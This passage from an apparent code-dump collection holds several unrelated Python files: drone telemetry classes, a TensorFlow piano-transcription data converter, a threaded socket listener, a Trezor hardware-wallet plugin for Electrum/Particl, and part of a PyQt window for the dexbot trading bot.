Attitude: Attitude.roll = roll, Attitude.pitch = pitch, Attitude.yaw = yaw of the drone
"""
return Attitude(self._roll,self._pitch,self._yaw,self._rollspeed,self._pitchspeed,self._yawspeed)
@property
def location(self):
"""Current Location of the drone
Returns:
Location: Location.lat = latitude
Location.lon = longitude
Location.alt = altitude
Location.altR = relative altitude
Location.north = north in NEU frame
Location.east = east in NEU frame
Location.down = down in NEU frame
"""
return Location(self._lat,self._lon,self._alt,self._relative_alt,self._north,self._east,self._down)
@property
def gps_0(self):
"""GPS status of the drone
Returns:
GPSInfo: GPSInfo.eph = eph of drone, GPSInfo.epv = epv of drone, GPSInfo.fix_type = fix type, GPSInfo.satellites_visible = number of satellites visible
"""
return(GPSInfo(self._eph,self._epv,self._fix_type,self._satellites_visible))
## Classes for drone conditions defined below
class Battery():
def __init__(self, voltage, current, level):
self.voltage = voltage / 1000.0
if current == -1:
self.current = None
else:
self.current = current #/ 100.0
if level == -1:
self.level = None
else:
self.level = level
def __str__(self):
return "Battery:voltage={},current={},level={}".format(self.voltage, self.current,
self.level)
class Location():
def __init__(self,lat=None,lon=None,alt=None,altR=None,north=None,east=None,down=None):
self.lat = lat
self.lon = lon
self.alt = alt
self.altR = altR
self.north = north
self.east = east
self.down = down
def __str__(self):
return "LocationGlobal:lat=%s,lon=%s,altR=%s,alt=%s || LocationLocal:north=%s,east=%s,down=%s" % (self.lat, self.lon, self.altR,self.alt,self.north, self.east, self.down)
class GPSInfo():
def __init__(self, eph, epv, fix_type, satellites_visible):
self.eph = eph
self.epv = epv
self.fix_type = fix_type
self.satellites_visible = satellites_visible
def __str__(self):
return "GPSInfo:fix=%s,num_sat=%s" % (self.fix_type, self.satellites_visible)
class Attitude():
def __init__(self, roll, pitch, yaw,rollspeed,pitchspeed,yawspeed):
self.pitch = pitch
self.yaw = yaw
self.roll = roll
self.rollspeed = rollspeed
self.pitchspeed = pitchspeed
self.yawspeed = yawspeed
def __str__(self):
return "Attitude:roll=%s,pitch=%s,yaw=%s" % (self.roll, self.pitch,self.yaw)
class Velocity():
def __init__(self,vx,vy,vz):
self.vx = vx
self.vy = vy
self.vz = vz
def __str__(self):
return "Velocity:vx=%s,vy=%s,vz=%s" % (self.vx, self.vy,self.vz)
|
wav2tfrd.py
|
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import tensorflow as tf
import numpy as np
import os
from multiprocessing import Manager, Pool #因为队列被多个进程共享,必须使用Manager里面的Queue
from threading import Thread
from concurrent.futures import ThreadPoolExecutor
from glovar import get_annotations
from glovar import cqt_dual, params
from glovar import MODES, FLAGS
from glovar import _int_feature, _float_feature
from functools import partial
import time
import random
random.seed(1)
def open_tfrecord_writer(network, mode, parallel_num):
tfrd_dir = os.path.join(FLAGS.save_dir, mode, network)
if not os.path.exists(tfrd_dir):
os.makedirs(tfrd_dir)
writers=[tf.python_io.TFRecordWriter(os.path.join(tfrd_dir, '%04d.tfrecords'%i)) for i in range(parallel_num)]
return writers
def close_tfrecord_writer(writers):
for writer in writers:
writer.close()
def frame_labels(label_path):
sr = params.sr
hop_len = params.hop_len
annotation = np.loadtxt(label_path)[:, [0, 2]]
frame_len = int(annotation[-1, 0]*sr/hop_len)
pitch_labels = np.zeros([frame_len, 88], dtype=np.uint8)
annotation = annotation[annotation[:,0]<=frame_len*hop_len/sr]
for onset, pitch in annotation:
pitch_labels[int(onset*sr/hop_len), int(pitch-21)] = 1
onset_labels = pitch_labels.any(axis=-1, keepdims=True).astype(np.uint8)
weighted_onset_labels = np.zeros_like(onset_labels)
frame_len = onset_labels.shape[0]
for i in range(frame_len):
if onset_labels[i] == 1:
weighted_onset_labels[i] = 3
elif onset_labels[max(i-1, 0):min(i+2, frame_len)].any():
weighted_onset_labels[i] = 2
elif onset_labels[max(i-2, 0):min(i+3, frame_len)].any():
weighted_onset_labels[i] = 1
return weighted_onset_labels, pitch_labels
def get_train_examples(mode, specs, onset_labels, pitch_labels):
spec_len, num_data, depth = specs.shape
num_data = min(num_data, onset_labels.shape[0])
offset = params.win_len//2
specs = np.pad(specs, ((0, 0), (offset, offset), (0,0)), 'constant')
onset_labels = np.pad(onset_labels, ((offset, offset), (0, 0)), 'constant')
pitch_labels = np.pad(pitch_labels, ((offset, offset), (0, 0)), 'constant')
split_specs = np.zeros([num_data, spec_len, params.win_len, depth], dtype=np.float32)
split_onset_labels = np.zeros([num_data, 1], dtype=np.uint8)
split_pitch_labels = np.zeros([num_data, 88], dtype=np.uint8)
for i in range(offset, offset+num_data):
split_specs[i-offset] = specs[:, i-offset:i+offset+1]
split_onset_labels[i-offset] = onset_labels[i]
split_pitch_labels[i-offset] = pitch_labels[i]
pos_idxs = list(np.where(np.reshape(split_onset_labels, [-1]) == 3)[0])
neg_idxs = list(np.where(np.reshape(split_onset_labels, [-1]) < 3)[0])
sample_neg_idxs = random.sample(neg_idxs,len(neg_idxs)//10) if mode == tf.estimator.ModeKeys.TRAIN else neg_idxs
onset_idxs = pos_idxs + sample_neg_idxs
pitch_idxs = pos_idxs
random.shuffle(onset_idxs)
random.shuffle(pitch_idxs)
onset_specs, onset_labels = split_specs[onset_idxs], split_onset_labels[onset_idxs]
pitch_specs, pitch_labels = split_specs[pitch_idxs], split_pitch_labels[pitch_idxs]
return (onset_specs, onset_labels), (pitch_specs, pitch_labels)
def producer(q1, q2, mode, annotation):
print('\n', annotation[0])
wav_path, label_path = annotation
specs = cqt_dual(wav_path)
onset_labels, pitch_labels = frame_labels(label_path)
(onset_specs, onset_labels), (pitch_specs, pitch_labels) = get_train_examples(mode, specs, onset_labels, pitch_labels)
to_example = lambda spec, label: tf.train.Example(
features=tf.train.Features(
feature={
'spec': _float_feature(spec),
'label': _int_feature(label),
}
)
)
def writer_to_queue(specs, labels, q):
for spec, label in zip(specs, labels):
example = to_example(spec, label).SerializeToString()
q.put(example)
t1 = Thread(target = writer_to_queue, args = (onset_specs, onset_labels, q1))
t2 = Thread(target = writer_to_queue, args = (pitch_specs, pitch_labels, q2))
t1.start()
t2.start()
t1.join()
t2.join()
print('\n', 'processing', os.getpid(), 'is leaving')
def consumer(q1, q2, w):
def writer_tfrd(q, w):
time.sleep(240)
while True:
try:
example = q.get(timeout=300)
except Exception as e:
break
w.write(example)
time.sleep(0.01)
w1, w2 = w
t1 = Thread(target=writer_tfrd, args=(q1, w1))
t2 = Thread(target=writer_tfrd, args=(q2, w2))
t1.start()
t2.start()
t1.join()
t2.join()
print('\n', 'consumer', os.getpid(), 'is leaving')
def convert_to_tfrecord(mode, anno):
assert mode in MODES, "模式错误"
onset_writers = open_tfrecord_writer('onset', mode, 64)
pitch_writers = open_tfrecord_writer('pitch', mode, 64)
writers = list(zip(onset_writers, pitch_writers))
manager = Manager()
q1 = manager.Queue()
q2 = manager.Queue()
p1 = Pool(FLAGS.parallel_num)
p2 = ThreadPoolExecutor(64)
p1_func = partial(producer, q1, q2, mode)
p2_func = partial(consumer, q1, q2)
p1.map_async(p1_func, anno)
p2.map(p2_func, writers)
p1.close()
p1.join()
print('\nfinish process pool')
p2.shutdown()
print('\nfinish threading pool')
close_tfrecord_writer(onset_writers)
close_tfrecord_writer(pitch_writers)
print('\nreturn to main thread')
def main(_):
annotation = get_annotations(tf.estimator.ModeKeys.TRAIN)
convert_to_tfrecord(tf.estimator.ModeKeys.TRAIN, annotation)
annotation = get_annotations(tf.estimator.ModeKeys.EVAL)
convert_to_tfrecord(tf.estimator.ModeKeys.EVAL, annotation)
if __name__ == '__main__':
tf.logging.set_verbosity(tf.logging.INFO)
tf.app.run()
|
Listener.py
|
#!/usr/bin/env python
# The MIT License (MIT)
#
# Copyright (c) 2015 Caian Benedicto <caian@ggaunicamp.com>
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to
# deal in the Software without restriction, including without limitation the
# rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
from libspitz import ClientEndpoint
from libspitz import config
from libspitz import log_lines
import socket, threading, time, logging, os, traceback, sys
class Listener(object):
"""Threaded TCP/UDS listener with callback"""
def __init__(self, mode, address, port, callback, user_args):
self.mode = mode
self.addr = address
self.port = port
self.callback = callback
self.user_args = user_args
self.thread = None
self.socket = None
def GetConnectableAddr(self):
addr = '' #self.mode
if self.mode == config.mode_tcp:
addr += socket.gethostname() + ':' + str(self.port)
elif self.mode == config.mode_uds:
addr += socket.gethostname() + ':' + str(self.addr)
else:
logging.error('Invalid listener mode %s provided!' % (self.mode))
raise Exception()
return addr
def listener(self):
if self.mode == config.mode_tcp:
logging.info('Listening to network at %s:%d...',
self.addr, self.port)
elif self.mode == config.mode_uds:
logging.info('Listening to file at %s...',
self.addr)
while True:
try:
conn, addr = self.socket.accept()
# Assign the address from the connection
if self.mode == config.mode_tcp:
# TCP
addr, port = addr
elif self.mode == config.mode_uds:
# UDS
addr = 'uds'
port = 0
# Create the endpoint and send to a thread to
# process the request
endpoint = ClientEndpoint(addr, port, conn)
threading.Thread(target = self.callback,
args=((endpoint, addr, port) + self.user_args)).start()
except:
log_lines(sys.exc_info(), logging.debug)
log_lines(traceback.format_exc(), logging.debug)
time.sleep(10)
def Start(self):
if self.socket:
return
if self.mode == config.mode_tcp:
# Create a TCP socket
socktype = socket.AF_INET
sockaddr = (self.addr, self.port)
elif self.mode == config.mode_uds:
# Remove an old socket
try:
os.unlink(self.addr)
except:
pass
# Create an Unix Data Socket instead of a
# normal TCP socket
try:
socktype = socket.AF_UNIX
except AttributeError:
logging.error('The system does not support ' +
'Unix Domain Sockets!')
raise
sockaddr = self.addr
else:
logging.error('Invalid listener mode %s provided!' % (self.mode))
raise Exception()
try:
self.socket = socket.socket(socktype, socket.SOCK_STREAM)
self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
except socket.error:
logging.error('Failed to create listener socket!')
try:
self.socket.bind(sockaddr)
self.socket.listen(1)
except socket.error:
logging.error('Failed to bind listener socket!')
# If any port is selected, get the
# actual port assigned by the system
if self.mode == config.mode_tcp and self.port == 0:
addr, port = self.socket.getsockname()
self.port = port
self.thread = threading.Thread(target=self.listener)
self.thread.start()
def Stop(self):
if self.socket:
self.socket.close()
self.socket = None
if self.mode == config.mode_uds:
# Remove the socket file if it is an UDS
try:
os.unlink(self.addr)
except:
pass
def Join(self):
if self.thread:
self.thread.join()
|
trezor.py
|
import traceback
import sys
from typing import NamedTuple, Any, Optional, Dict, Union, List, Tuple, TYPE_CHECKING
from electrum.util import bfh, bh2u, versiontuple, UserCancelled, UserFacingException
from electrum.bip32 import BIP32Node, convert_bip32_path_to_list_of_uint32 as parse_path
from electrum import constants
from electrum.i18n import _
from electrum.plugin import Device, runs_in_hwd_thread
from electrum.transaction import Transaction, PartialTransaction, PartialTxInput, PartialTxOutput
from electrum.keystore import Hardware_KeyStore
from electrum.base_wizard import ScriptTypeNotSupported, HWD_SETUP_NEW_WALLET
from electrum.logging import get_logger
from ..hw_wallet import HW_PluginBase
from ..hw_wallet.plugin import (is_any_tx_output_on_change_branch, trezor_validate_op_return_output_and_get_data,
LibraryFoundButUnusable, OutdatedHwFirmwareException,
get_xpubs_and_der_suffixes_from_txinout)
_logger = get_logger(__name__)
try:
import trezorlib
import trezorlib.transport
from trezorlib.transport.bridge import BridgeTransport, call_bridge
from .clientbase import TrezorClientBase
from trezorlib.messages import (
Capability, BackupType, RecoveryDeviceType, HDNodeType, HDNodePathType,
InputScriptType, OutputScriptType, MultisigRedeemScriptType,
TxInputType, TxOutputType, TxOutputBinType, TransactionType, AmountUnit)
from trezorlib.client import PASSPHRASE_ON_DEVICE
TREZORLIB = True
except Exception as e:
if not (isinstance(e, ModuleNotFoundError) and e.name == 'trezorlib'):
_logger.exception('error importing trezor plugin deps')
TREZORLIB = False
class _EnumMissing:
def __init__(self):
self.counter = 0
self.values = {}
def __getattr__(self, key):
if key not in self.values:
self.values[key] = self.counter
self.counter += 1
return self.values[key]
Capability = _EnumMissing()
BackupType = _EnumMissing()
RecoveryDeviceType = _EnumMissing()
AmountUnit = _EnumMissing()
PASSPHRASE_ON_DEVICE = object()
# Trezor initialization methods
TIM_NEW, TIM_RECOVER = range(2)
TREZOR_PRODUCT_KEY = 'Trezor'
class TrezorKeyStore(Hardware_KeyStore):
hw_type = 'trezor'
device = TREZOR_PRODUCT_KEY
plugin: 'TrezorPlugin'
def get_client(self, force_pair=True):
return self.plugin.get_client(self, force_pair)
def decrypt_message(self, sequence, message, password):
raise UserFacingException(_('Encryption and decryption are not implemented by {}').format(self.device))
def sign_message(self, sequence, message, password, *, script_type=None):
client = self.get_client()
address_path = self.get_derivation_prefix() + "/%d/%d"%sequence
script_type = self.plugin.get_trezor_input_script_type(script_type)
msg_sig = client.sign_message(address_path, message, script_type=script_type)
return msg_sig.signature
def sign_transaction(self, tx, password):
if tx.is_complete():
return
# previous transactions used as inputs
prev_tx = {}
for txin in tx.inputs():
tx_hash = txin.prevout.txid.hex()
if txin.utxo is None:
raise UserFacingException(_('Missing previous tx.'))
prev_tx[tx_hash] = txin.utxo
self.plugin.sign_transaction(self, tx, prev_tx)
class TrezorInitSettings(NamedTuple):
word_count: int
label: str
pin_enabled: bool
passphrase_enabled: bool
recovery_type: Any = None
backup_type: int = BackupType.Bip39
no_backup: bool = False
class TrezorPlugin(HW_PluginBase):
# Derived classes provide:
#
# class-static variables: client_class, firmware_URL, handler_class,
# libraries_available, libraries_URL, minimum_firmware,
# wallet_class, types
firmware_URL = 'https://wallet.trezor.io'
libraries_URL = 'https://pypi.org/project/trezor/'
minimum_firmware = (1, 5, 2)
keystore_class = TrezorKeyStore
minimum_library = (0, 13, 0)
maximum_library = (0, 14)
SUPPORTED_XTYPES = ('standard', 'p2wpkh-p2sh', 'p2wpkh', 'p2wsh-p2sh', 'p2wsh')
DEVICE_IDS = (TREZOR_PRODUCT_KEY,)
MAX_LABEL_LEN = 32
def __init__(self, parent, config, name):
super().__init__(parent, config, name)
self.libraries_available = self.check_libraries_available()
if not self.libraries_available:
return
self.device_manager().register_enumerate_func(self.enumerate)
self._is_bridge_available = None
def get_library_version(self):
import trezorlib
try:
version = trezorlib.__version__
except Exception:
version = 'unknown'
if TREZORLIB:
return version
else:
raise LibraryFoundButUnusable(library_version=version)
@runs_in_hwd_thread
def is_bridge_available(self) -> bool:
# Testing whether the Bridge is available can take several seconds
# (when it is not), as it is slow to timeout, hence we cache it.
if self._is_bridge_available is None:
try:
call_bridge("enumerate")
except Exception:
self._is_bridge_available = False
# never again try with Bridge due to slow timeout
BridgeTransport.ENABLED = False
else:
self._is_bridge_available = True
return self._is_bridge_available
@runs_in_hwd_thread
def enumerate(self):
# If there is a bridge, prefer that.
# On Windows, the bridge runs as Admin (and Electrum usually does not),
# so the bridge has better chances of finding devices. see #5420
# This also avoids duplicate entries.
if self.is_bridge_available():
devices = BridgeTransport.enumerate()
else:
devices = trezorlib.transport.enumerate_devices()
return [Device(path=d.get_path(),
interface_number=-1,
id_=d.get_path(),
product_key=TREZOR_PRODUCT_KEY,
usage_page=0,
transport_ui_string=d.get_path())
for d in devices]
@runs_in_hwd_thread
def create_client(self, device, handler):
try:
self.logger.info(f"connecting to device at {device.path}")
transport = trezorlib.transport.get_transport(device.path)
except BaseException as e:
self.logger.info(f"cannot connect at {device.path} {e}")
return None
if not transport:
self.logger.info(f"cannot connect at {device.path}")
return
self.logger.info(f"connected to device at {device.path}")
# note that this call can still raise!
return TrezorClientBase(transport, handler, self)
@runs_in_hwd_thread
def get_client(self, keystore, force_pair=True, *,
devices=None, allow_user_interaction=True) -> Optional['TrezorClientBase']:
client = super().get_client(keystore, force_pair,
devices=devices,
allow_user_interaction=allow_user_interaction)
# returns the client for a given keystore. can use xpub
if client:
client.used()
return client
def get_coin_name(self):
return "Testnet" if constants.net.TESTNET else "Particl"
def initialize_device(self, device_id, wizard, handler):
# Initialization method
msg = _("Choose how you want to initialize your {}.").format(self.device, self.device)
choices = [
# Must be short as QT doesn't word-wrap radio button text
(TIM_NEW, _("Let the device generate a completely new seed randomly")),
(TIM_RECOVER, _("Recover from a seed you have previously written down")),
]
def f(method):
import threading
settings = self.request_trezor_init_settings(wizard, method, device_id)
t = threading.Thread(target=self._initialize_device_safe, args=(settings, method, device_id, wizard, handler))
t.setDaemon(True)
t.start()
exit_code = wizard.loop.exec_()
if exit_code != 0:
# this method (initialize_device) was called with the expectation
# of leaving the device in an initialized state when finishing.
# signal that this is not the case:
raise UserCancelled()
wizard.choice_dialog(title=_('Initialize Device'), message=msg, choices=choices, run_next=f)
def _initialize_device_safe(self, settings, method, device_id, wizard, handler):
exit_code = 0
try:
self._initialize_device(settings, method, device_id, wizard, handler)
except UserCancelled:
exit_code = 1
except BaseException as e:
self.logger.exception('')
handler.show_error(repr(e))
exit_code = 1
finally:
wizard.loop.exit(exit_code)
@runs_in_hwd_thread
def _initialize_device(self, settings: TrezorInitSettings, method, device_id, wizard, handler):
if method == TIM_RECOVER and settings.recovery_type == RecoveryDeviceType.ScrambledWords:
handler.show_error(_(
"You will be asked to enter 24 words regardless of your "
"seed's actual length. If you enter a word incorrectly or "
"misspell it, you cannot change it or go back - you will need "
"to start again from the beginning.\n\nSo please enter "
"the words carefully!"),
blocking=True)
devmgr = self.device_manager()
client = devmgr.client_by_id(device_id)
if not client:
raise Exception(_("The device was disconnected."))
if method == TIM_NEW:
strength_from_word_count = {12: 128, 18: 192, 20: 128, 24: 256, 33: 256}
client.reset_device(
strength=strength_from_word_count[settings.word_count],
passphrase_protection=settings.passphrase_enabled,
pin_protection=settings.pin_enabled,
label=settings.label,
backup_type=settings.backup_type,
no_backup=settings.no_backup)
elif method == TIM_RECOVER:
client.recover_device(
recovery_type=settings.recovery_type,
word_count=settings.word_count,
passphrase_protection=settings.passphrase_enabled,
pin_protection=settings.pin_enabled,
label=settings.label)
if settings.recovery_type == RecoveryDeviceType.Matrix:
handler.close_matrix_dialog()
else:
raise RuntimeError("Unsupported recovery method")
def _make_node_path(self, xpub, address_n):
bip32node = BIP32Node.from_xkey(xpub)
node = HDNodeType(
depth=bip32node.depth,
fingerprint=int.from_bytes(bip32node.fingerprint, 'big'),
child_num=int.from_bytes(bip32node.child_number, 'big'),
chain_code=bip32node.chaincode,
public_key=bip32node.eckey.get_public_key_bytes(compressed=True),
)
return HDNodePathType(node=node, address_n=address_n)
def setup_device(self, device_info, wizard, purpose):
device_id = device_info.device.id_
client = self.scan_and_create_client_for_device(device_id=device_id, wizard=wizard)
if not client.is_uptodate():
msg = (_('Outdated {} firmware for device labelled {}. Please '
'download the updated firmware from {}')
.format(self.device, client.label(), self.firmware_URL))
raise OutdatedHwFirmwareException(msg)
if not device_info.initialized:
self.initialize_device(device_id, wizard, client.handler)
is_creating_wallet = purpose == HWD_SETUP_NEW_WALLET
wizard.run_task_without_blocking_gui(
task=lambda: client.get_xpub('m', 'standard', creating=is_creating_wallet))
client.used()
return client
def get_xpub(self, device_id, derivation, xtype, wizard):
if xtype not in self.SUPPORTED_XTYPES:
raise ScriptTypeNotSupported(_('This type of script is not supported with {}.').format(self.device))
client = self.scan_and_create_client_for_device(device_id=device_id, wizard=wizard)
xpub = client.get_xpub(derivation, xtype)
client.used()
return xpub
def get_trezor_input_script_type(self, electrum_txin_type: str):
if electrum_txin_type in ('p2wpkh', 'p2wsh'):
return InputScriptType.SPENDWITNESS
if electrum_txin_type in ('p2wpkh-p2sh', 'p2wsh-p2sh'):
return InputScriptType.SPENDP2SHWITNESS
if electrum_txin_type in ('p2pkh',):
return InputScriptType.SPENDADDRESS
if electrum_txin_type in ('p2sh',):
return InputScriptType.SPENDMULTISIG
if electrum_txin_type in ('p2tr',):
return InputScriptType.SPENDTAPROOT
raise ValueError('unexpected txin type: {}'.format(electrum_txin_type))
def get_trezor_output_script_type(self, electrum_txin_type: str):
if electrum_txin_type in ('p2wpkh', 'p2wsh'):
return OutputScriptType.PAYTOWITNESS
if electrum_txin_type in ('p2wpkh-p2sh', 'p2wsh-p2sh'):
return OutputScriptType.PAYTOP2SHWITNESS
if electrum_txin_type in ('p2pkh',):
return OutputScriptType.PAYTOADDRESS
if electrum_txin_type in ('p2sh',):
return OutputScriptType.PAYTOMULTISIG
if electrum_txin_type in ('p2tr',):
return OutputScriptType.PAYTOTAPROOT
raise ValueError('unexpected txin type: {}'.format(electrum_txin_type))
def get_trezor_amount_unit(self):
if self.config.decimal_point == 0:
return AmountUnit.SATOSHI
elif self.config.decimal_point == 2:
return AmountUnit.MICROBITCOIN
elif self.config.decimal_point == 5:
return AmountUnit.MILLIBITCOIN
else:
return AmountUnit.BITCOIN
@runs_in_hwd_thread
def sign_transaction(self, keystore, tx: PartialTransaction, prev_tx):
prev_tx = {bfh(txhash): self.electrum_tx_to_txtype(tx) for txhash, tx in prev_tx.items()}
client = self.get_client(keystore)
inputs = self.tx_inputs(tx, for_sig=True, keystore=keystore)
outputs = self.tx_outputs(tx, keystore=keystore)
signatures, _ = client.sign_tx(self.get_coin_name(),
inputs, outputs,
lock_time=tx.locktime,
version=tx.version,
amount_unit=self.get_trezor_amount_unit(),
prev_txes=prev_tx)
signatures = [(bh2u(x) + '01') for x in signatures]
tx.update_signatures(signatures)
@runs_in_hwd_thread
def show_address(self, wallet, address, keystore=None):
if keystore is None:
keystore = wallet.get_keystore()
if not self.show_address_helper(wallet, address, keystore):
return
deriv_suffix = wallet.get_address_index(address)
derivation = keystore.get_derivation_prefix()
address_path = "%s/%d/%d"%(derivation, *deriv_suffix)
script_type = self.get_trezor_input_script_type(wallet.txin_type)
# prepare multisig, if available:
xpubs = wallet.get_master_public_keys()
if len(xpubs) > 1:
pubkeys = wallet.get_public_keys(address)
# sort xpubs using the order of pubkeys
sorted_pairs = sorted(zip(pubkeys, xpubs))
multisig = self._make_multisig(
wallet.m,
[(xpub, deriv_suffix) for pubkey, xpub in sorted_pairs])
else:
multisig = None
client = self.get_client(keystore)
client.show_address(address_path, script_type, multisig)
def tx_inputs(self, tx: Transaction, *, for_sig=False, keystore: 'TrezorKeyStore' = None):
inputs = []
for txin in tx.inputs():
if txin.is_coinbase_input():
txinputtype = TxInputType(
prev_hash=b"\x00"*32,
prev_index=0xffffffff, # signed int -1
)
else:
txinputtype = TxInputType(
prev_hash=txin.prevout.txid,
prev_index=txin.prevout.out_idx,
)
if for_sig:
assert isinstance(tx, PartialTransaction)
assert isinstance(txin, PartialTxInput)
assert keystore
if len(txin.pubkeys) > 1:
xpubs_and_deriv_suffixes = get_xpubs_and_der_suffixes_from_txinout(tx, txin)
txinputtype.multisig = self._make_multisig(txin.num_sig, xpubs_and_deriv_suffixes)
txinputtype.script_type = self.get_trezor_input_script_type(txin.script_type)
my_pubkey, full_path = keystore.find_my_pubkey_in_txinout(txin)
if full_path:
txinputtype.address_n = full_path
txinputtype.amount = txin.value_sats()
txinputtype.script_sig = txin.script_sig
txinputtype.sequence = txin.nsequence
inputs.append(txinputtype)
return inputs
def _make_multisig(self, m, xpubs):
if len(xpubs) == 1:
return None
pubkeys = [self._make_node_path(xpub, deriv) for xpub, deriv in xpubs]
return MultisigRedeemScriptType(
pubkeys=pubkeys,
signatures=[b''] * len(pubkeys),
m=m)
def tx_outputs(self, tx: PartialTransaction, *, keystore: 'TrezorKeyStore'):
def create_output_by_derivation():
script_type = self.get_trezor_output_script_type(txout.script_type)
if len(txout.pubkeys) > 1:
xpubs_and_deriv_suffixes = get_xpubs_and_der_suffixes_from_txinout(tx, txout)
multisig = self._make_multisig(txout.num_sig, xpubs_and_deriv_suffixes)
else:
multisig = None
my_pubkey, full_path = keystore.find_my_pubkey_in_txinout(txout)
assert full_path
txoutputtype = TxOutputType(
multisig=multisig,
amount=txout.value,
address_n=full_path,
script_type=script_type)
return txoutputtype
def create_output_by_address():
if address:
return TxOutputType(
amount=txout.value,
script_type=OutputScriptType.PAYTOADDRESS,
address=address,
)
else:
return TxOutputType(
amount=txout.value,
script_type=OutputScriptType.PAYTOOPRETURN,
op_return_data=trezor_validate_op_return_output_and_get_data(txout),
)
outputs = []
has_change = False
any_output_on_change_branch = is_any_tx_output_on_change_branch(tx)
for txout in tx.outputs():
address = txout.address
use_create_by_derivation = False
if txout.is_mine and not has_change:
# prioritise hiding outputs on the 'change' branch from user
# because no more than one change address allowed
# note: ^ restriction can be removed once we require fw
# that has https://github.com/trezor/trezor-mcu/pull/306
if txout.is_change == any_output_on_change_branch:
use_create_by_derivation = True
has_change = True
if use_create_by_derivation:
txoutputtype = create_output_by_derivation()
else:
txoutputtype = create_output_by_address()
outputs.append(txoutputtype)
return outputs
def electrum_tx_to_txtype(self, tx: Optional[Transaction]):
t = TransactionType()
if tx is None:
# probably for segwit input and we don't need this prev txn
return t
tx.deserialize()
t.version = tx.version
t.lock_time = tx.locktime
t.inputs = self.tx_inputs(tx)
t.bin_outputs = [
TxOutputBinType(amount=o.value, script_pubkey=o.scriptpubkey)
for o in tx.outputs()
]
return t
|
worker_list.py
|
import time
import webbrowser
from threading import Thread
from grapheneapi.exceptions import NumRetriesReached
from PyQt5.QtCore import pyqtSlot
from PyQt5.QtGui import QFontDatabase
from PyQt5.QtWidgets import QMainWindow
from dexbot import __version__
from dexbot.config import Config
from dexbot.controllers.wallet_controller import WalletController
from dexbot.qt_queue.idle_queue import idle_add
from dexbot.qt_queue.queue_dispatcher import ThreadDispatcher
from dexbot.views.create_wallet import CreateWalletView
from dexbot.views.create_worker import CreateWorkerView
from dexbot.views.errors import gui_error
from dexbot.views.layouts.flow_layout import FlowLayout
from dexbot.views.settings import SettingsView
from dexbot.views.ui.worker_list_window_ui import Ui_MainWindow
from dexbot.views.unlock_wallet import UnlockWalletView
from dexbot.views.worker_item import WorkerItemWidget
class MainView(QMainWindow, Ui_MainWindow):
def __init__(self, main_controller):
super().__init__()
self.setupUi(self)
self.main_controller = main_controller
self.config = main_controller.config
self.max_workers = 10
self.num_of_workers = 0
self.worker_widgets = {}
self.closing = False
self.status_bar_updater = None
self.statusbar_updater_first_run = True
self.main_controller.set_info_handler(self.set_worker_status)
self.layout = FlowLayout(self.scrollAreaContent)
self.dispatcher = None
# GUI buttons
self.add_worker_button.clicked.connect(self.handle_add_worker)
self.settings_button.clicked.connect(self.handle_open_settings)
self.help_button.clicked.connect(self.handle_open_documentation)
self.unlock_wallet_button.clicked.connect(self.handle_login)
# Hide certain buttons by default until login success
self.add_worker_button.hide()
self.status_bar.showMessage("ver {} - Node disconnected".format(__version__))
QFontDatabase.addApplicationFont(":/bot_widget/font/SourceSansPro-Bold.ttf")
def connect_to_bitshares(self):
# Check if there is already a connection
if self.config['node']:
# Test nodes first. This only checks if we're able to connect
self.status_bar.showMessage('Connecting to Bitshares...')
try:
self.main_controller.measure_latency(self.config['node'])
except NumRetriesReached:
self.status_bar.showMessage(
'ver {} - Coudn\'t connect to Bitshares. '
'Please use different node(s) and retry.'.format(__version__)
)
self.main_controller.set_bitshares_instance(None)
return False
self.main_controller.new_bitshares_instance(self.config['node'])
self.status_bar.showMessage(self.get_statusbar_message())
return True
else:
# Config has no nodes in it
self.status_bar.showMessage(
'ver {} - Node(s) not found. ' 'Please add node(s) from settings.'.format(__version__)
)
return False
@pyqtSlot(name='handle_login')
def handle_login(self):
if not self.main_controller.bitshares_instance:
if not self.connect_to_bitshares():
return
wallet_controller = WalletController(self.main_controller.bitshares_instance)
if wallet_controller.wallet_created():
unlock_view = UnlockWalletView(wallet_controller)
else:
unlock_view = CreateWalletView(wallet_controller)
if unlock_view.exec_():
# Hide button once successful wallet creation / login
self.unlock_wallet_button.hide()
self.add_worker_button.show()
# Load worker widgets from config file
workers = self.config.workers_data
for worker_name in workers:
self.add_worker_widget(worker_name)
# Limit the max amount of workers so that the performance isn't greatly affected
if self.num_of_workers >= self.max_workers:
self.add_worker_button.setEnabled(False)
break
# Dispatcher polls for events from the workers that are used to change the ui
self.dispatcher = ThreadDispatcher(self)
self.dispatcher.start()
self.status_bar.showMessage("ver {} - Node delay: - ms".format(__version__))
self.status_bar_updater = Thread(target=self._update_statusbar_message)
self.status_bar_updater.start()
def add_worker_widget(self, worker_name):
config = self.config.get_worker_config(worker_name)
widget = WorkerItemWidget(worker_name, config, self.main_controller, self)
widget.setFixedSize(widget.frameSize())
self.layout.addWidget(widget)
self.worker_widgets[worker_name] = widget
# Limit the max amount of workers so that the performance isn't greatly affected
self.num_of_workers += 1
if self.num_of_workers >= self.max_workers:
self.add_worker_button.setEnabled(False)
def remove_worker_widget(self, worker_name):
self.worker_widgets.pop(worker_name, None)
self.num_of_workers -= 1
if self.num_of_workers < self.max_workers:
self.add_worker_button.setEnabled(True)
def change_worker_widget_name(self, old_worker_name, new_worker_name):
worker_data = self.worker_widgets.pop(old_worker_name)
self.worker_widgets[new_worker_name] = worker_data
@pyqtSlot(name='handle_add_worker')
@gui_error
def handle_add_worker(self):
create_worker_dialog = CreateWorkerView(self.main_controller.bitshares_instance)
return_value = create_worker_dialog.exec_()
# User clicked save
